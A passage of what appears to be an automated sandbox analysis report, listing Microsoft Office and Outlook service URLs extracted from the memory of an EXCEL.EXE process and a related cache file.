      Source: EXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdatedR
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: EXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiest
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: EXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated~
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://onedrive.live.com
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false2
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?iNam
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://osi.office.net
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netB
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netP
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netS
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://otelrules.azureedge.net
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://outlook.office.com
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com(
      Source: EXCEL.EXE, 00000000.00000002.933997365.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782673322.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662745522.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787123980.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743580229.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807929408.000000001328A000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://outlook.office.com/
      Source: EXCEL.EXE, 00000000.00000002.933931227.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782557094.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807864897.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662707230.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787086454.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743519317.0000000013235000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comonf
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://outlook.office365.com
      Source: EXCEL.EXE, 00000000.00000002.933997365.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782673322.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662745522.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787123980.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743580229.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807929408.000000001328A000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://outlook.office365.com/
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activitiesa_
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonaB
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/r
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook-L
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782387248.0000000013153000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: EXCEL.EXE, 00000000.00000002.933761146.0000000013153000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782387248.0000000013153000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplanding
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: EXCEL.EXE, 00000000.00000002.933931227.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782557094.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807864897.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662707230.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787086454.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743519317.0000000013235000.00000004.00000001.sdmpString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptionspBj
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControlA
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: EXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-132
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosS
      Source: EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmpString found in binary or memory: https://pptOSI.D
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://roaming.edog.
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.comRQ;
      Source: EXCEL.EXE, 00000000.00000002.933931227.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782557094.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807864897.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662707230.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787086454.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743519317.0000000013235000.00000004.00000001.sdmpString found in binary or memory: https://rr.offic
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://settings.outlook.com
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://settings.outlook.comS_
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work=3
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://staging.cortana.ai
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.airl
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.airlq
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://store.office.cn/addinstemplate
